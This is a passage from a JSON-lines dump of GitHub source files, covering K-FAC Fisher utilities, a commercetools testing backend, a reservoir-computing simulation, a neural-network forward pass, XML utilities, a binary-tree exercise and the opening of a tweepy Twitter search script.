\")\n known_modules = {'Linear', 'Conv2d'}\n\n if proper:\n CovAHandler = ComputeCovA_proper()\n CovGHandler = ComputeCovG_proper()\n StoreAHandler = StoreA_proper()\n StoreGHandler = StoreG_proper()\n else:\n CovAHandler = ComputeCovA()\n CovGHandler = ComputeCovG()\n StoreAHandler = StoreA()\n StoreGHandler = StoreG()\n\n inp_hooks = [_save_input(m_aa, CovAHandler)]\n out_hooks = [_save_grad_output(m_gg, CovGHandler)]\n\n if offdiagonal:\n assert s_aa is not None\n assert s_gg is not None\n inp_hooks.append(_save_input_offdiagonal(s_aa, StoreAHandler))\n out_hooks.append(_save_grad_output_offdiagonal(s_gg, StoreGHandler))\n\n for module_name, module in model.named_modules():\n print(module)\n classname = module.__class__.__name__\n if classname in known_modules:\n modules.append(module)\n module_names.append(module_name)\n for inp_hook in inp_hooks:\n module.register_forward_pre_hook(inp_hook)\n for out_hook in out_hooks:\n module.register_backward_hook(out_hook)\n print('(%s): %s' % (count, module))\n count += 1\n modules = modules[fix_layers:]\n module_names = module_names[fix_layers:]\n return modules, module_names\n\ndef get_module_keys(model, prune_modules=None):\n modules = []\n known_modules = {'WrappedLayer'}\n for module_name, module in model.named_modules():\n classname = module.__class__.__name__\n if classname in known_modules:\n if hasattr(module, 'custom_name'):\n modules.append(module)\n\n return modules\n\ndef get_module_custom_names(model, prune_modules=None):\n custom_names = []\n known_modules = {'WrappedLayer'}\n for module_name, module in model.named_modules():\n classname = module.__class__.__name__\n if classname in known_modules:\n if hasattr(module, 'custom_name'):\n custom_names.append(module.custom_name)\n return custom_names\n\ndef _get_block_kro_dic(modules, s_dic):\n kro_dic = {}\n for i, mod_i in enumerate(modules):\n kro_dic[mod_i] = s_dic[mod_i].t() @ s_dic[mod_i]\n return kro_dic\n\ndef _get_kro_dic(modules, s_dic):\n kro_dic = {}\n for i, mod_i in enumerate(modules):\n for j, mod_j in enumerate(modules):\n kro_dic[f\"{mod_i.custom_name}_{mod_j.custom_name}\"] = s_dic[mod_i.custom_name].t() @ s_dic[mod_j.custom_name]\n return kro_dic\n\ndef _to_kro_dic(modules, m_dic):\n kro_dic = {}\n for i, mod_i in enumerate(modules):\n kro_dic[f\"{mod_i.custom_name}_{mod_i.custom_name}\"] = m_dic[mod_i.custom_name]\n return kro_dic\n\ndef convert_to_kro_dic(model, m_dic, prune_modules=None):\n custom_names = get_module_custom_names(model, prune_modules=prune_modules)\n print(custom_names, prune_modules)\n kro_dic = {}\n for i, custom_name in enumerate(custom_names):\n print(f\"key is {custom_name}_{custom_name}\")\n kro_dic[f\"{custom_name}_{custom_name}\"] = m_dic[custom_name]\n return kro_dic\n\n\ndef compare_norms(mat1, mat2):\n diff_norm = (mat1 - mat2).norm()\n print(f\"Difference norm: {diff_norm.item()}, mat1 norm: {mat1.norm().item()}, mat2 norm: {mat1.norm().item()}.\")\n print(f\"Ratio of the norm difference to largest norm: {diff_norm.item()/max(mat1.norm(), mat2.norm()).item()}.\")\n\ndef compare_blockwise_curvature_matrices(model, mat1, mat2):\n offset = 0\n total_norm = 0\n for param in model.parameters():\n num_param = param.numel()\n layer_norm = (mat1[offset:offset + num_param, offset:offset + num_param] -\n mat2[offset:offset + num_param, offset:offset + num_param]).norm()\n print(f\"norm for layer with params from {offset} to {offset + num_param} is \", layer_norm)\n total_norm += layer_norm ** 2\n offset += num_param\n total_norm = total_norm ** 
(1 / 2)\n print(\"Total norm difference across the layer blocks is \", total_norm.item())\n return total_norm\n\ndef are_blockwise_close(model, mat1, mat2, atol=1e-5):\n offset = 0\n for param in model.parameters():\n num_param = param.numel()\n print(f\"checking for layer with params from {offset} to {offset + num_param}: \")\n print(torch.allclose(mat1[offset:offset + num_param, offset:offset + num_param],\n mat2[offset:offset + num_param, offset:offset + num_param], atol=atol))\n offset += num_param\n\n\ndef inv_covs(xxt, ggt, eps, use_pi=True):\n # Modified from https://github.com/Thrandis/EKFAC-pytorch/blob/master/kfac.py\n\n \"\"\"Inverses the covariances.\"\"\"\n # num_locations is 1 for conv,\n # but for conv it is more like the product of spatial dimensions\n\n pi = 1.0\n if use_pi:\n # Computes pi\n tx = torch.trace(xxt) * ggt.shape[0]\n tg = torch.trace(ggt) * xxt.shape[0]\n pi = (tx / tg)\n\n # Regularizes and inverse\n\n diag_xxt = xxt.new(xxt.shape[0]).fill_((eps * pi) ** 0.5)\n diag_ggt = ggt.new(ggt.shape[0]).fill_((eps / pi) ** 0.5)\n print(diag_xxt.mean(), diag_ggt.mean())\n ixxt = (xxt + torch.diag(diag_xxt)).inverse()\n iggt = (ggt + torch.diag(diag_ggt)).inverse()\n return ixxt, iggt\n\n\ndef get_blockwise_kfac_inverse(model, m_aa=None, m_gg=None, s_aa=None, s_gg=None, num_samples=5000, damp=1e-5, use_pi=True, offload_cpu=False):\n num_params = sum([module.numel() for module in model.parameters()])\n device = list(model.parameters())[0].device\n\n if offload_cpu:\n emp_kfac_blockwise_fisher_inv = torch.zeros(num_params, num_params).cpu()\n else:\n emp_kfac_blockwise_fisher_inv = torch.zeros(num_params, num_params).to(device)\n\n block_offset = 0\n modules = get_module_keys(model)\n print(modules)\n if m_aa is None and m_gg is None and s_aa is not None and s_gg is not None:\n print(\"compute m_aa and m_gg again\")\n m_aa, m_gg = _get_kro_dic(modules, s_aa), _get_kro_dic(modules, s_gg)\n\n for idx, mod in enumerate(modules):\n block_params = block_offset + kronecker_shape(m_aa[f\"{mod.custom_name}_{mod.custom_name}\"].shape, m_gg[f\"{mod.custom_name}_{mod.custom_name}\"].shape)\n print(f\"updating diagonal fisher inverse block, {block_offset}:{block_params}\")\n aainv, gginv = inv_covs(m_aa[f\"{mod.custom_name}_{mod.custom_name}\"]/num_samples, m_gg[f\"{mod.custom_name}_{mod.custom_name}\"]/num_samples, eps=damp, use_pi=use_pi)\n if offload_cpu:\n emp_kfac_blockwise_fisher_inv[block_offset:block_params, block_offset:block_params] = kronecker(\n gginv.cpu(), aainv.cpu())\n else:\n emp_kfac_blockwise_fisher_inv[block_offset:block_params, block_offset:block_params] = kronecker(\n gginv, aainv)\n\n block_offset += kronecker_shape(gginv.shape, aainv.shape)\n del aainv, gginv\n\n return emp_kfac_blockwise_fisher_inv\n\n","repo_name":"IST-DASLab/WoodFisher","sub_path":"utils/kfac_fisher_utils.py","file_name":"kfac_fisher_utils.py","file_ext":"py","file_size_in_byte":15409,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"76"} +{"seq_id":"33289507848","text":"import datetime\nimport uuid\nfrom typing import Optional\n\nfrom commercetools.platform import models\nfrom commercetools.platform.models._schemas.customer import (\n CustomerDraftSchema,\n CustomerPagedQueryResponseSchema,\n CustomerSchema,\n CustomerUpdateSchema,\n)\nfrom commercetools.testing import abstract, utils\nfrom commercetools.testing.utils import create_commercetools_response\n\n\nclass CustomerModel(abstract.BaseModel):\n _resource_schema = CustomerSchema\n 
_primary_type_name = \"customer\"\n _unique_values = [\"key\"]\n\n def _create_from_draft(\n self, draft: models.CustomerDraft, id: Optional[str] = None\n ) -> models.Customer:\n object_id = uuid.UUID(id) if id is not None else uuid.uuid4()\n now = datetime.datetime.now(datetime.timezone.utc)\n\n return models.Customer(\n id=str(object_id),\n version=1,\n created_at=now,\n last_modified_at=now,\n authentication_mode=models.AuthenticationMode.PASSWORD,\n customer_number=draft.customer_number,\n email=draft.email,\n password=draft.password,\n first_name=draft.first_name,\n last_name=draft.last_name,\n middle_name=draft.middle_name,\n title=draft.title,\n date_of_birth=draft.date_of_birth,\n company_name=draft.company_name,\n vat_id=draft.vat_id,\n addresses=draft.addresses,\n default_shipping_address_id=(\n str(draft.default_shipping_address)\n if draft.default_shipping_address\n else None\n ),\n shipping_address_ids=(\n [str(address_id) for address_id in draft.shipping_addresses]\n if draft.shipping_addresses\n else None\n ),\n default_billing_address_id=(\n str(draft.default_billing_address)\n if draft.default_billing_address\n else None\n ),\n billing_address_ids=(\n [str(address_id) for address_id in draft.billing_addresses]\n if draft.billing_addresses\n else None\n ),\n is_email_verified=draft.is_email_verified,\n external_id=draft.external_id,\n customer_group=draft.customer_group,\n custom=utils.create_from_draft(draft.custom),\n locale=draft.locale,\n salutation=draft.salutation,\n key=draft.key,\n )\n\n\nclass CustomerBackend(abstract.ServiceBackend):\n service_path = \"customers\"\n model_class = CustomerModel\n _schema_draft = CustomerDraftSchema\n _schema_update = CustomerUpdateSchema\n _schema_query_response = CustomerPagedQueryResponseSchema\n\n def urls(self):\n return [\n (\"^$\", \"GET\", self.query),\n (\"^$\", \"POST\", self.create),\n (\"^key=(?P[^/]+)$\", \"GET\", self.get_by_key),\n (\"^key=(?P[^/]+)$\", \"POST\", self.update_by_key),\n (\"^key=(?P[^/]+)$\", \"DELETE\", self.delete_by_key),\n (\"^(?P[^/]+)$\", \"GET\", self.get_by_id),\n (\"^(?P[^/]+)$\", \"POST\", self.update_by_id),\n (\"^(?P[^/]+)$\", \"DELETE\", self.delete_by_id),\n ]\n\n def create(self, request):\n obj = self._schema_draft().loads(request.body)\n data = self.model.add(obj)\n\n # Convert to CustomerSignInResult\n data = {\"customer\": data, \"cart\": None}\n\n expanded_data = self._expand(request, data)\n return create_commercetools_response(request, json=expanded_data)\n","repo_name":"labd/commercetools-python-sdk","sub_path":"src/commercetools/testing/customers.py","file_name":"customers.py","file_ext":"py","file_size_in_byte":3617,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"76"} +{"seq_id":"72391278326","text":"from math import floor\n\nseries_name = input()\nseasons_count = int(input())\nepisodes_count = int(input())\nepisode_duration = float(input())\n\nads_duration_per_episode = episode_duration * 0.2\nepisode_duration += ads_duration_per_episode\nspeical_episodes_extra_duration = seasons_count * 10\n\ntotal_watch_time = episode_duration * episodes_count * seasons_count + speical_episodes_extra_duration\n\nprint(f'Total time needed to watch the {series_name} series is {floor(total_watch_time)} 
minutes.')","repo_name":"StivanD/Sofutni-Python","sub_path":"01_python_basics/programming_basics_exams/programming_basics_online_exam_15_and_16_june_2019/01_series_calculator.py","file_name":"01_series_calculator.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"34942066383","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\nimport os\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport networkx as nx\r\n#import user-defined functions\r\nfrom functions import define_grid_graph_2,initialize_graph_attributes, mod_voltage_node_analysis, update_edge_weigths\r\nfrom functions_reservoir import dataset_to_pulse, insert_R_to_graph, remove_R_from_graph\r\n#%%\r\ndef plot(H):\r\n remove_R_from_graph(H, src, new_nodes, gnd)\r\n fig3, ax = plt.subplots(figsize=(10, 10))\r\n plt.cla()\r\n pos=nx.get_node_attributes(H,'pos')\r\n \r\n nx.draw_networkx(H, pos,\r\n #NODES\r\n node_size=60,\r\n node_color=[H.nodes[n]['V'] for n in H.nodes()],\r\n cmap=plt.cm.Blues,\r\n vmin=0,\r\n vmax=pulse_amplitude+V_read,\r\n #EDGES\r\n width=4,\r\n edge_color=[H[u][v]['Y'] for u,v in H.edges()],\r\n edge_cmap=plt.cm.Reds,\r\n edge_vmin=g_min,\r\n edge_vmax=g_max,\r\n with_labels=False, #Set TRUE to see node numbers\r\n font_size=6,)\r\n nx.draw_networkx_nodes(H, pos, nodelist=src, node_size=100, node_color='k')\r\n\r\n\r\n#%% OUTPUT DIRECTORIES\r\n \r\nout_dir_3 = './out_data/Fig3/'\r\nout_dir_4 = './out_data/Fig4/'\r\n\r\nif not os.path.exists(r'./out_data/Fig3/'):\r\n os.makedirs(r'./out_data/Fig3/')\r\nif not os.path.exists(r'./out_data/Fig4/'):\r\n os.makedirs(r'./out_data/Fig4/')\r\n\r\n#%% DATASET LOAD & DISPLAY\r\n\r\nfile_to_train = './raw_data/pattern'\r\n\r\nfile_train = file_to_train+'.txt'\r\nfile_train_class = file_to_train+'_class.txt'\r\n\r\ndigit_train = np.loadtxt(file_train)\r\ndigit_train_class = np.loadtxt(file_train_class)\r\n\r\ndigit_rows = 4\r\ndigit_cols = 4\r\n\r\ntotal_rows_train = int(len(digit_train))\r\nnum_digits_train = len(digit_train_class)\r\n\r\ndigit_list_train = [[] for i in range(0, num_digits_train)]\r\nfor i in range(0, num_digits_train):\r\n digit_list_train[i] =digit_train[digit_rows*i:digit_rows*(i+1)][:]\r\n \r\ncolor_n = ['--*b','--*r','--*g']\r\nname = ['North', 'East', 'South']\r\npattern_name = ['diag1', 'diag2', 'horz', 'vert']\r\n \r\n#%% NETWORK PROPERTIES DEFINITION\r\n# north pulse fit\r\nkp0 = 2.555173332603108574e-06\r\nkd0 = 6.488388862524891465e+01\r\neta_p = 3.492155165334443012e+01\r\neta_d = 5.590601016803570467e+00\r\ng_min = 1.014708121672117710e-03\r\ng_max = 2.723493729125820492e-03\r\ng0 = 5.602507668026886038e-04\r\ng0 = g_min\r\n \r\nxdim = 21 # graph dimension\r\nydim = 21\r\nframe = 2 #number of frame rows/columns\r\n\r\nleft_pads = [(xdim-1)*(frame+1)-2-3*i for i in range(0, 5)] # (from top to bottom)\r\nright_pads = [(xdim*xdim-1)-xdim*frame-frame-2-3*i for i in range(0, 5)] # (from top to bottom)\r\ntop_pads = [(xdim-1)+xdim*(frame+2)-frame+xdim*3*i for i in range(0, 5)] # (from left to right)\r\nbottom_pads = [xdim*(frame+2)+frame+xdim*3*i for i in range(0, 5)] # (from left to right)\r\n\r\npad_N = top_pads[2] \r\npad_E = right_pads[2]\r\npad_S = bottom_pads[2] \r\npad_W = left_pads[2]\r\n\r\nsrc = [pad_N, pad_E, pad_S, pad_W]\r\nnew_nodes = [xdim*xdim+nn for nn in range(4)]\r\ngnd = [new_nodes[-1]+1]\r\n\r\n#%% NETWORK INPUTs\r\n\r\n####### CUSTOMIZE YOUR PULSE SHAPE ###############\r\nR_read = [82]*4\r\nV_read = 
100e-3\r\npulse_amplitude = 5 # Volts\r\n\r\ndelta_pot = 250e-6 # distance for potentiation points\r\ndelta_dep = 250e-6 # distance for depression points\r\ndelta_read = delta_dep\r\ndelta = 250e-6 # distance for transition from low to high signal and viceversa \r\n\r\npulse_time = 10e-3-delta\r\nidle_time = 5e-4-delta \r\nread_time = 5.5e-3 # seconds between write and read\r\n\r\n####################################################\r\nread_timesteps = int(read_time/delta_read)-1\r\npulse_timesteps = int(pulse_time/delta_pot) \r\nidle_timesteps = int(idle_time/delta_dep)\r\n\r\none_pulse = 2*idle_timesteps+pulse_timesteps+3 # points of a single pulse\r\n\r\n\r\ntime_write_1 = np.linspace(0, idle_time, idle_timesteps+1)\r\ntime_write_2 = np.linspace(idle_time+delta, idle_time+delta+pulse_time, pulse_timesteps+1)\r\ntime_write_3 = np. linspace(idle_time+pulse_time+2*delta, idle_time+pulse_time+2*delta+idle_time, idle_timesteps+1)\r\ntime_write_tot = np.append(np.append(time_write_1, time_write_2), time_write_3)\r\n\r\ntime_write = time_write_tot\r\n\r\nfor i in range(1, digit_cols):\r\n time_write = np.append(time_write, time_write_tot+time_write[-1]+delta_dep)\r\n\r\ntimesteps_write = len(time_write)\r\n\r\nint_point = [[] for ip in range(digit_cols+1)]\r\n\r\nfor ip in range(0, digit_cols+1):\r\n int_point[ip] = one_pulse*ip+idle_timesteps \r\n\r\nint_point[-1] = timesteps_write+read_timesteps\r\n\r\ndataset_readout = [[] for i in range(0, num_digits_train)] # input for readout function\r\ndataset_to_save = [[] for i in range(0, num_digits_train)] # input for readout function\r\n\r\nhist = np.zeros((5,4,3))\r\nH_to_plot = [[[] for j in range(5)] for i in range(4)]\r\nV_list_read = [[np.zeros((4, timesteps_write+read_timesteps+1))] for i in range(4)]\r\n\r\nfor digit in range(0, num_digits_train):\r\n \r\n print('Simulating pattern '+ pattern_name[digit])\r\n\r\n G = define_grid_graph_2(xdim, ydim)\r\n G = initialize_graph_attributes(G, g0) \r\n input_digit = int(digit_train_class[digit])\r\n\r\n\r\n H_list_write = [[] for t in range(0, timesteps_write+read_timesteps+1)]\r\n \r\n train_pulse, _ = dataset_to_pulse(digit_rows, digit_cols, timesteps_write, pulse_timesteps+1, idle_timesteps+1, digit_list_train, digit, pulse_amplitude)\r\n \r\n Vin_list_write = [[] for t in range(0, timesteps_write)]\r\n\r\n for t in range(0, timesteps_write):\r\n for r in range(0, digit_rows):\r\n if train_pulse[r][t] == 0:\r\n Vin_list_write[t] = list(Vin_list_write[t])+[int(r==digit_rows-1)*V_read]\r\n else:\r\n Vin_list_write[t] = list(Vin_list_write[t])+[int(r==digit_rows-1)*V_read+np.multiply(pulse_amplitude,(train_pulse[r][t]))]\r\n\r\n \r\n insert_R_to_graph(G, R_read, src, new_nodes, gnd)\r\n \r\n H_list_write[0] = mod_voltage_node_analysis(G, Vin_list_write[0], new_nodes, gnd)\r\n \r\n for i in range(1, timesteps_write):\r\n \r\n delta_t = time_write[i] - time_write[i-1]\r\n \r\n remove_R_from_graph(G, src, new_nodes, gnd) \r\n G = update_edge_weigths(G, delta_t, g_min, g_max, kp0, eta_p, kd0, eta_d) #update edges\r\n insert_R_to_graph(G, R_read, src, new_nodes, gnd)\r\n \r\n H_list_write[i] = mod_voltage_node_analysis(G, Vin_list_write[i], new_nodes, gnd)\r\n for c in range(4):\r\n V_list_read[digit][0][c, i] = H_list_write[i].nodes[src[c]]['V']\r\n \r\n for i in range(timesteps_write, timesteps_write+read_timesteps+1):\r\n \r\n delta_t = delta_read\r\n \r\n remove_R_from_graph(G, src, new_nodes, gnd) \r\n G = update_edge_weigths(G, delta_t, g_min, g_max, kp0, eta_p, kd0, eta_d) #update edges\r\n 
insert_R_to_graph(G, R_read, src, new_nodes, gnd)\r\n \r\n H_list_write[i] = mod_voltage_node_analysis(G, Vin_list_write[-1], new_nodes, gnd)\r\n for c in range(4):\r\n V_list_read[digit][0][c, i] = H_list_write[i].nodes[src[c]]['V']\r\n \r\n time_int = int_point\r\n\r\n for t_int in range(5):\r\n H_to_plot[digit][t_int] = H_list_write[time_int[t_int]]\r\n for n in range(3):\r\n hist[t_int,digit,n] = H_list_write[time_int[t_int]].nodes[src[n]]['V']\r\n \r\n print('Pattern '+pattern_name[digit]+' completed\\n')\r\n \r\n#%% FIG 3\r\n\r\nplt.figure(figsize=(18,9))\r\n\r\nfor n in range(3):\r\n plt.plot(range(5), hist[:,0,n], color_n[n], label=name[n], linewidth=1.5)\r\nplt.title(pattern_name[0], fontsize=20)\r\nplt.grid()\r\nplt.xticks(range(5), ['t0', 't1', 't2', 't3', 't4'], fontsize=15)\r\nplt.yticks(fontsize=15)\r\nplt.ylabel('Voltage [V]', fontsize=15)\r\nplt.legend(fontsize=15)\r\nplt.ylim([ np.min(hist[:,:,:])-0.001, np.max(hist[:,:,:])]) \r\nplt.savefig(out_dir_3+'diag1_Vout_vs_time_model.png')\r\n\r\nfor t_int in range(5):\r\n plot(H_to_plot[0][t_int])\r\n name = 'pattern_'+pattern_name[0]+'_t_int_'+str(t_int)+'.png'\r\n plt.savefig(out_dir_3+name) \r\n \r\nfsave = hist[:,0,0]\r\nfname = 'pattern_'+pattern_name[0]+'_Vout_vs_time_model.txt'\r\nfor n in range(1, 3):\r\n fsave = np.vstack((fsave, hist[:,0,n]))\r\nnp.savetxt(out_dir_3+fname, fsave.T, header='n1 - n2 - n3') \r\n\r\n#%% FIG 4\r\n\r\nplt.figure(figsize=(18,9)) \r\nfor i in range(4):\r\n plt.subplot(1,4,i+1)\r\n plt.bar([1, 2, 3], hist[-1,i,:], color='dodgerblue', alpha=0.5)\r\n plt.ylim([0, np.max(hist[[0,-1],:,:])])\r\n plt.xticks([1,2,3], fontsize = 15)\r\n plt.yticks(fontsize = 15)\r\n plt.xlabel('Neuron', fontsize = 15)\r\n plt.ylabel('Voltage [V]', fontsize = 15)\r\n plt.title('Pattern: '+pattern_name[i], fontsize = 20)\r\nplt.tight_layout()\r\nplt.savefig(out_dir_4+'hist_model.png')\r\n\r\nfor p in range(4):\r\n plot(H_to_plot[p][-1])\r\n name = 'pattern_'+pattern_name[p]+'_t_int_'+str(t_int)+'.png'\r\n plt.savefig(out_dir_4 + name)\r\n \r\nfile_to_save = hist[-1,:,:]\r\nnp.savetxt(out_dir_4+'hist_model.txt', file_to_save.T, header='t1-t2-t3-t4', delimiter=' ')\r\n ","repo_name":"MilanoGianluca/Nanowire_Network_Reservoir_Computing","sub_path":"Fig_3_4/RC_pattern.py","file_name":"RC_pattern.py","file_ext":"py","file_size_in_byte":9190,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"12070494572","text":"import numpy as np\nimport time\n\"\"\"\nThe functions of the first part: Forward propagation process\n\"\"\"\n\n\n# a.\ndef initialize_parameters(layer_dims):\n dic = {}\n np.random.seed(int(time.time()))\n for i in range(1, len(layer_dims)):\n dic['W' + str(i)] = np.random.random((layer_dims[i], layer_dims[i - 1]))/100\n dic['b' + str(i)] = np.zeros((layer_dims[i], 1))\n return dic\n\n\n# b.\ndef linear_forward(A, W, b):\n Z = W.dot(A) + b\n cache = (A, W, b)\n return Z, cache\n\n\n# c.\ndef sigmoid(Z):\n return 1 / (1 + np.exp(-Z)),Z\n\n\n# d.\ndef relu(Z):\n zeros = np.zeros((Z.shape[0], Z.shape[1]))\n rel = np.maximum(zeros, Z)\n return rel, Z\n\n\n# e.\ndef linear_activation_forward(A_prev, W, B, activation):\n Z, linear_cache = linear_forward(A_prev, W, B)\n if activation == \"sigmoid\":\n A, activation_cache = sigmoid(Z)\n elif activation == \"relu\":\n A, activation_cache = relu(Z)\n return A, (linear_cache, activation_cache)\n\n\n# f.\ndef L_model_forward(X, parameters, use_batchnorm=False, dropout=0.5):\n caches = []\n N_layers = len(parameters) // 
2\n A = X\n for l in range(1, N_layers):\n A_last = A\n A, cache = linear_activation_forward(A_last, parameters['W' + str(l)], parameters['b' + str(l)], 'relu')\n A = DropOut(A, dropout)\n if (use_batchnorm):\n A = apply_batchnorm(A)\n caches.append(cache)\n AL, cache = linear_activation_forward(A, parameters['W' + str(N_layers)], parameters['b' + str(N_layers)], 'sigmoid')\n caches.append(cache)\n return AL, caches\n\n\n# g.\ndef compute_cost(AL, Y):\n cost = (-1 / Y.shape[1]) * np.sum(np.multiply(np.log(AL),Y) + np.multiply( np.log(1 - AL),1-Y))\n if cost.shape != ():\n cost = np.squeeze(cost)\n return cost\n\n\n# h.\ndef apply_batchnorm(A):\n return (A-np.mean(A, axis=0)) / (np.var(A, axis=0)+1e-8)\n\ndef DropOut(L,rate):\n drop = np.random.rand(L.shape[0],L.shape[1])\n for i in range(L.shape[0]):\n for j in range(L.shape[1]):\n if drop[i][j] <= rate:\n drop[i][j] = 0\n else:\n drop[i][j] = 1\n res = drop*L\n return res\n","repo_name":"YR23/Deep-Learning-Assignment-1","sub_path":"forward_propagation.py","file_name":"forward_propagation.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"2796364633","text":"import xml.etree.ElementTree as ET\r\nimport re\r\nimport commands as cm\r\n\r\ndef putCommand(src,dest):\r\n xmlfile =\"new.xml\"\r\n tree = ET.parse(xmlfile)\r\n root = tree.getroot()\r\n for item in root.findall('./FOLDER/JOB'):\r\n jobName = item.attrib['JOBNAME']\r\n action = re.findall(r'(FW|GBT|MSEQ|CD|EBT)$', jobName)#change\r\n regex = r\"(?<=(^BIHAU_T2_BH\"+src+\"_\"+dest+\"_))(.*?)(?=(_(FW|GBT|MSEQ|CD|EBT))$)\"\r\n fileExt = re.findall(regex, jobName)#change\r\n if len(action)!=0 and len(fileExt)!=0:\r\n action = action[0]\r\n fileExt = fileExt[0][1]\r\n\r\n #change if-else block\r\n if action == 'FW':\r\n sameActionCommand = cm.FW\r\n elif action == 'GBT':\r\n sameActionCommand = cm.GBT\r\n elif action == 'MSEQ':\r\n sameActionCommand = cm.MSEQ\r\n elif action == 'CD':\r\n sameActionCommand = cm.CD\r\n elif action == 'EBT':\r\n sameActionCommand = cm.EBT\r\n else:\r\n sameActionCommand = ['']\r\n\r\n\r\n commandline = 'hostname'\r\n for i in cm.FW:\r\n #check the index of the FW command for the current job file and use the same index for this job\r\n if fileExt in i.upper():\r\n cmdIndex = cm.FW.index(i)\r\n print(fileExt,\" \",cmdIndex)\r\n commandline = sameActionCommand[cmdIndex]\r\n \r\n item.set('CMDLINE', commandline)\r\n\r\n tree.write(src+\"_\"+dest+\".xml\")\r\n\r\nif __name__ == \"__main__\":\r\n putCommand(\"GADEN\",\"TALLYMAN\")\r\n","repo_name":"anirbanmaji/Control-M-xml-modification","sub_path":"Tallyman/addCommand.py","file_name":"addCommand.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"7675257914","text":"\"\"\"\n遍历找出所有路径,然后逐条判断\n\"\"\"\nclass BITNode:\n def __init__(self):\n self.data = None\n self.lchild = None\n self.rchild = None\n\n\"\"\"\n方法:打印所有满足根节点等于num的所有路径\n参数,root,输入的目标值num, 路径和sum, 路径v是列表\n\"\"\"\ndef FindRoad(root,num,sums,v):\n # v是一个list用于存储路径\n sums+=root.data\n v.append(root.data)\n if root.lchild == None and root.rchild ==None and sums == num :\n print(v,end=\"\\n\")\n # 遍历左子树\n if root.lchild != None:\n FindRoad(root.lchild,num,sums,v)\n if root.rchild != None:\n FindRoad(root.rchild,num,sums,v)\n # 清除遍历路径\n sums = sums - v[-1]\n v.remove(v[-1])\n\ndef constructTree():\n root = BITNode()\n node1 = BITNode()\n node2 = 
BITNode()\n node3 = BITNode()\n node4 = BITNode()\n root.data = 6\n node1.data = 3\n node2.data = -7\n node3.data = -1\n node4.data = 9\n root.lchild = node1\n root.rchild = node2\n node1.lchild = node3\n node1.rchild = node4\n node2.lchild=node2.rchild=node3.lchild=node3.rchild=node4.lchild=node4.rchild=None\n return root\n\nif __name__ == \"__main__\":\n root = constructTree()\n s = []\n FindRoad(root,8,0,s)","repo_name":"karlhl/Programmer_Algorithm_Interview","sub_path":"第三章 二叉树/3.10 二叉树中找出与输入整数相等的所有路径.py","file_name":"3.10 二叉树中找出与输入整数相等的所有路径.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"74324091124","text":"import xml.etree.ElementTree as et \nimport pandas as pd\nimport sys\nfrom tqdm import tqdm\n\n\ndef parse_tree(root):\n df_cols = [\"ds_name\", \"id\", \"frame_num\", \"orientation\", \"box_h\", \"box_w\", \"box_xc\", \"box_yc\", \"appearance\", \"movement\", \"role\", \"context\", \"situation\"]\n df = pd.DataFrame(columns=df_cols)\n d = {}\n ds_name = root.attrib.get('name')\n d[\"ds_name\"] = ds_name\n for frame in tqdm(root):\n frame_num = frame.attrib.get('number')\n d[\"frame_num\"] = frame_num\n\n objectlist = frame[0]\n # grouplist = frame[1]\n \n for obj in objectlist:\n objectid = obj.attrib.get('id')\n d['id'] = objectid\n\n orientation = obj[0].text\n d['orientation'] = orientation\n\n box = obj[1].attrib\n\n box_h = box.get('h')\n d['box_h'] = box_h\n\n box_w = box.get('w')\n d['box_w'] = box_w\n\n box_xc = box.get('xc')\n d['box_xc'] = box_xc\n\n box_yc = box.get('yc')\n d['box_yc'] = box_yc\n\n appearance = obj[2].text\n d['appearance'] = appearance\n\n hypothesis = obj[3][0]\n movement = hypothesis[0].text\n d['movement'] = movement\n\n role = hypothesis[1].text\n d['role'] = role\n\n context = hypothesis[2].text\n d['context'] = context\n\n situation = hypothesis[3].text\n d['situation'] = situation\n\n df = df.append(d, ignore_index=True)\n return df\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 3:\n raise EnvironmentError('Not enough arguments specified')\n INFILE = sys.argv[1]\n OUTFILE = sys.argv[2]\n xtree = et.parse(\"test.xml\")\n xroot = xtree.getroot()\n\n df = parse_tree(xroot)\n df.to_csv(OUTFILE)","repo_name":"ishvlad/TrackTion","sub_path":"xml_to_csv.py","file_name":"xml_to_csv.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11360722069","text":"import tweepy\nimport requests\nimport os\nimport sys\nfrom dotenv import load_dotenv\nimport zipfile\nimport io\nimport pathlib\n\n#all api keys stored in .env file\n#get API keys within heroku environment\nconsumer_key=str(os.environ.get('CONSUMER_KEY'))\nconsumer_secret=str(os.environ.get('CONSUMER_SECRET'))\naccess_token_key=str(os.environ.get('ACCESS_TOKEN_KEY'))\naccess_token_secret=str(os.environ.get('ACCESS_TOKEN_SECRET'))\n\n#if using script outside of heroku environment\nif consumer_key == 'None':\n load_dotenv()\n consumer_key=str(os.environ.get('CONSUMER_KEY'))\n consumer_secret=str(os.environ.get('CONSUMER_SECRET'))\n access_token_key=str(os.environ.get('ACCESS_TOKEN_KEY'))\n access_token_secret=str(os.environ.get('ACCESS_TOKEN_SECRET'))\n\n\n#init API\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token_key, access_token_secret)\n\napi = tweepy.API(auth)\n\n#search tweets\ndef search(tag, count = 10, likes = 0, lang = None):\n # 
